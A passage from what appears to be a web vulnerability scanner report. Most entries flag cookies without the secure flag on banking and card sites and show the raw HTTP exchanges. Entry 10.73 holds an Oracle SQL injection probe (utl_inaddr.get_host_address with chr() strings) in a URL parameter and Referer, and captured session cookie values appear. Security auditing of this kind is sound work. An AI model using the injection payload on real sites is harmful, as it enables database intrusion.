Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296759635-11855865; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=82A8A851D01949528AD578CC9601958F; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Date: Thu, 03 Feb 2011 19:00:35 GMT
Connection: close
Content-Length: 485

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['https://a248.e.akamai.net/img.redcated/images/pixel.gif','https://ad.bizo.com/pixel?id=175863&t=2','https
...[SNIP]...

10.73. https://vms.boldchat.com/aid/3760177095415339810/bc.pv

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vms.boldchat.com
Path:   /aid/3760177095415339810/bc.pv

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aid/3760177095415339810/bc.pv?blur=false&poll=60000&url=https%3A//www.supermedia.com/spportal/spportalFlow.do%3F_flowExecutionKey%3D%2527%257C%257C%28utl_inaddr.get_host_address%28%28select+chr%2895%29%257C%257Cchr%2833%29%257C%257Cchr%2864%29%257C%257Cchr%2851%29%257C%257Cchr%28100%29%257C%257Cchr%28105%29%257C%257Cchr%28108%29%257C%257Cchr%28101%29%257C%257Cchr%28109%29%257C%257Cchr%28109%29%257C%257Cchr%2897%29+from+DUAL%29%29%29%257C%257C%2527&pvid=1296759669758946057&wdid=798708614246318013&idid=2139287495442682134&cp=https&vr=Processing%20Error%20Title&1296759669434 HTTP/1.1
Accept: */*
Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: vms.boldchat.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: bc-visitor-id=0=0

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml"
X-Boldcenter-PageViewID: 1296759669758946057
X-Boldcenter-VisitID: 9223372036839666059
Set-Cookie: bc-visitor-id=798708614246318013=3840678644403429768&0=0; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 19:00:36 GMT
Set-Cookie: bc-visit-id=798708614246318013=9223372036839666059; domain=.boldchat.com; path=/
Content-Type: image/gif
Connection: close
Date: Thu, 03 Feb 2011 19:00:36 GMT
Content-Length: 35

GIF89a.............,........@..D..;

10.74. https://www.americanexpress.com/airlines-credit-card/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.americanexpress.com
Path:   /airlines-credit-card/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /airlines-credit-card/ HTTP/1.1
Host: www.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:47:49 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296740869522520; path=/; expires=Sun, 07-Feb-16 13:47:49 GMT; domain=.americanexpress.com
Accept-Ranges: bytes
Cache-Control: max-age=-11431291
Expires: Fri, 24 Sep 2010 06:26:18 GMT
Connection: close
Content-Type: text/html
Content-Length: 33688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

10.75. https://www.americanexpress.com/credit-card-rewards/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.americanexpress.com
Path:   /credit-card-rewards/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /credit-card-rewards/ HTTP/1.1
Host: www.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:47:53 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296740873112805; path=/; expires=Sun, 07-Feb-16 13:47:53 GMT; domain=.americanexpress.com
Accept-Ranges: bytes
Cache-Control: max-age=-11431221
Expires: Fri, 24 Sep 2010 06:27:32 GMT
Connection: close
Content-Type: text/html
Content-Length: 34269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

10.76. https://www.americanexpress.com/gift/giftcardslanding.shtml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.americanexpress.com
Path:   /gift/giftcardslanding.shtml

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gift/giftcardslanding.shtml HTTP/1.1
Host: www.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:47:48 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296740868411065; path=/; expires=Sun, 07-Feb-16 13:47:48 GMT; domain=.americanexpress.com
Accept-Ranges: bytes
Cache-Control: max-age=-284016
Expires: Mon, 31 Jan 2011 06:54:12 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 64996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
   
...[SNIP]...

10.77. https://www.americanexpress.com/gold-card/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.americanexpress.com
Path:   /gold-card/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gold-card/ HTTP/1.1
Host: www.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:47:55 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296740875303415; path=/; expires=Sun, 07-Feb-16 13:47:55 GMT; domain=.americanexpress.com
Accept-Ranges: bytes
Cache-Control: max-age=-11431212
Expires: Fri, 24 Sep 2010 06:27:43 GMT
Connection: close
Content-Type: text/html
Content-Length: 33640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

10.78. https://www.americanexpress.com/no-annual-fee-credit-cards/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.americanexpress.com
Path:   /no-annual-fee-credit-cards/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /no-annual-fee-credit-cards/ HTTP/1.1
Host: www.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:47:53 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296740873890003; path=/; expires=Sun, 07-Feb-16 13:47:53 GMT; domain=.americanexpress.com
Accept-Ranges: bytes
Cache-Control: max-age=-11431200
Expires: Fri, 24 Sep 2010 06:27:53 GMT
Connection: close
Content-Type: text/html
Content-Length: 33670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

10.79. https://www.banking.us.hsbc.com/HICServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.banking.us.hsbc.com
Path:   /HICServlet

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HICServlet HTTP/1.1
Host: www.banking.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 16:35:29 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296750929.438276; path=/; expires=Sun, 31-Jan-2021 16:35:29 GMT
Surrogate-control: no-store
Content-language: en-US
Set-cookie: HSBCUSID=00013uF8pzmV9vu4OA6F5HlhYcO:15fcas229; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


           <script language="javascript">
               window.location="/personal/personal_home_page.html"
        </script>



10.80. https://www.mystreetscape.com/my/citizensinvest

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mystreetscape.com
Path:   /my/citizensinvest

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my/citizensinvest HTTP/1.1
Host: www.mystreetscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: FWS/7.0
Date: Thu, 03 Feb 2011 15:39:39 GMT
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
Set-cookie: MC=WypGP_b5c8mV_jNQmSsiR3IOaXISAk1KzDsKAUw2IAAL6AABqjMGBAAAAQAGBU1KzDsAP03; path=/; domain=.mystreetscape.com; expires=Fri, 03-Feb-2012 15:39:39 GMT
Set-cookie: spc=121; path=/
Cache-control: public
Set-cookie: HttpOnly
Set-cookie: JSESSIONID=4F87F0A2406FC4D216FAB75C56426E60; path=/; secure
Content-length: 259
Content-type: text/html
Fsreqid: REQ4d4acc3b0a014c3620000be80000aa33
Fscalleeid: ibweb121
Fselapsedtime: 10048
Connection: close


<html>

<head>


<title>
Citizens Investments
</title>

</head>

<FRAMESET ROWS="100%, *" frameborder=no border=0>
<FRAME NAME="mainframe" onload='javascript:' SRC="/my/citizensinvest/jsp/login
...[SNIP]...

10.81. https://www.openforum.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?cid=inav_home&inav=menu_business_openforum HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2769004736.20480.0000; path=/
Content-Length: 102267


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

10.82. https://www.regions.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.83. https://www.regions.com/App_Themes/Default/img/arrowGray_Small.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/Default/img/arrowGray_Small.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Default/img/arrowGray_Small.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 68
Content-Type: image/gif
Last-Modified: Fri, 28 Sep 2007 02:40:58 GMT
Accept-Ranges: bytes
ETag: "059d6ff781c81:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:17 GMT

GIF89a.......VWQTTRVVXVVTUUUTTT......!.......,..........    Xf@V...V..;

10.84. https://www.regions.com/App_Themes/Default/img/arrowOrange.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/Default/img/arrowOrange.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Default/img/arrowOrange.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 60
Content-Type: image/gif
Last-Modified: Fri, 28 Sep 2007 02:41:00 GMT
Accept-Ranges: bytes
ETag: "08671791c81:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:17 GMT

GIF89a..    .....f..........!.......,......    ........-..49v.).;

10.85. https://www.regions.com/App_Themes/Default/img/bgDot.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/Default/img/bgDot.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Default/img/bgDot.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 46
Content-Type: image/gif
Last-Modified: Fri, 28 Sep 2007 02:41:00 GMT
Accept-Ranges: bytes
ETag: "08671791c81:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:18 GMT

GIF89a.............!.......,.................;

10.86. https://www.regions.com/App_Themes/Default/img/logoEqualHousingLender.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/Default/img/logoEqualHousingLender.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Default/img/logoEqualHousingLender.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 252
Content-Type: image/gif
Last-Modified: Fri, 28 Sep 2007 02:41:00 GMT
Accept-Ranges: bytes
ETag: "08671791c81:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:18 GMT

GIF89a......UUU.....................zzz......}}}...iii...uuu...^^^...aaa...mmm.........MMM...[[[\\\...LLL...!.......,.........y.'..5..X.^......q.Y....-...s`|f.C.A.T...E4.^N......>..kb.4..
....!    AV#j
...[SNIP]...

10.87. https://www.regions.com/App_Themes/Default/screen.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/Default/screen.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Default/screen.css HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; www.regions.com-ssl=R1752032910; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Type: text/css
Last-Modified: Wed, 07 Apr 2010 18:14:26 GMT
Accept-Ranges: bytes
ETag: "06d12287ed6ca1:7c0f"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:15 GMT
Content-Length: 16717

/* CSS Document */

body {background: #ffffff; font-family: Arial; color: #444444; font-size: .75em; margin: 0px 0px 0px 0px; padding: 0px; text-align: center; min-width: 895px;    }

table {font-siz
...[SNIP]...

10.88. https://www.regions.com/Contact.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /Contact.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Contact.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/contact.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/contact.rf">here</a>.</h2>
</body></html>

10.89. https://www.regions.com/FAQ/insured_deposits.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /FAQ/insured_deposits.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FAQ/insured_deposits.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/faq/insured_deposits.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 163

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/faq/insured_deposits.rf">here</a>.</h2>
</body></html>

10.90. https://www.regions.com/GoogleSearch.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /GoogleSearch.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GoogleSearch.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.91. https://www.regions.com/Locator.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /Locator.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Locator.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18903


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.92. https://www.regions.com/Rates.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /Rates.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Rates.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.93. https://www.regions.com/about_regions.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /about_regions.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_regions.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.94. https://www.regions.com/about_regions/economic_update.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /about_regions/economic_update.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

